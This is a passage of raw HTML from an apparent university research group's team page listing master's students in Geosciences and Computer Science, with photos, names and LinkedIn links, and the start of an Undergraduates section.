style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/sara-edwards1.jpg\" class=\"wp-image-1399 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg\" class=\"wp-image-1050 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg\" class=\"wp-image-874 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c128-outer\">\n            <div data-colibri-id=\"182-c128\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c128 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c129\" class=\"d-block style-854 style-local-182-c129 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo-e1695781168350.jpeg\" class=\"wp-image-1369 style-854-image style-local-182-c129-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c129-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c130\" class=\"h-global-transition-all h-heading style-850 style-local-182-c130 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c130\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sikiru Bayo Abdulkareem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c131\" class=\"h-text h-text-component style-851 style-local-182-c131 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c132\" class=\"h-text h-text-component style-902 style-local-182-c132 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c133\" class=\"style-855 style-local-182-c133 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"www.linkedin.com/in/bayonle\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-1663377340901.jpg\" class=\"wp-image-1657 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  